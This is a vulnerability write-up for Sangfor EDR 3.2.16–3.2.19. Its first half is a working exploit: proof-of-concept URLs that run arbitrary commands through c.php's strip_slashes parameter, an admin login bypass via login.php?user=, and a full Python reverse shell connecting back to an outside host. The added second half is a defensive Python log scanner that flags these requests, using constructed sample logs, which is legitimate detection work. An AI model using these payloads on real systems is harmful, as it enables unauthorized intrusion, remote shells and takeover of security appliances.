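Sangfor EDR Arbitrary Command Execution Vulnerability
Affected Versions
EDR 3.2.16, 3.2.17, 3.2.19
Vulnerability PoC
Supplying a command as the value of any of the parameters host, path, row or limit (host/path/row/limit=<command>) executes that command: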
https://*****/tool/log/c.php?strip_slashes=system&host=id
https://*****/tool/log/c.php?strip_slashes=system&path=id
https://*****/tool/log/c.php?strip_slashes=system&row=id
https://*****/tool/log/c.php?strip_slashes=system&limit=id
# Unauthorized login
https://ip:xx/ui/login.php?user=admin #(the username must exist)
# Command execution
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
# Reverse shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
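To check whether an appliance has received the requests listed above, the following added example (not part of the original page or of any Sangfor tooling) scans web access log lines for them. It assumes a common/combined-format access log whose request line includes the query string, and that legitimate traffic never passes strip_slashes to c.php or user= to login.php in the URL; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from a common/combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
CMD_PARAMS = ("host", "path", "row", "limit")  # parameters named on the page

def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    path = url.path.lower()
    # Any request that sets strip_slashes on c.php matches the PoC pattern.
    if path.endswith("/tool/log/c.php") and "strip_slashes" in query:
        args = {p: query[p][0] for p in CMD_PARAMS if p in query}
        return {"ip": m["ip"], "rule": "c.php strip_slashes override",
                "callable": query["strip_slashes"][0], "args": args,
                "status": m["status"]}
    # Assumption: a normal login never carries user= in the query string.
    if path.endswith("/ui/login.php") and "user" in query:
        return {"ip": m["ip"], "rule": "login.php user= in query string",
                "user": query["user"][0], "status": m["status"]}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not from a real host.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0800] "GET /ui/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2021:10:01:00 +0800] "GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1" 200 64',
    '198.51.100.7 - - [01/Jan/2021:10:01:05 +0800] "GET /tool/log/c.php?strip_slashes=system&path=whoami HTTP/1.1" 200 32',
    '203.0.113.5 - - [01/Jan/2021:10:02:00 +0800] "GET /ui/login.php?user=admin HTTP/1.1" 302 0',
    '192.0.2.10 - - [01/Jan/2021:10:03:00 +0800] "GET /tool/log/c.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with a 200 status on the c.php rule means the request reached the script, so the value recorded under args should be treated as a command that may have run on the host.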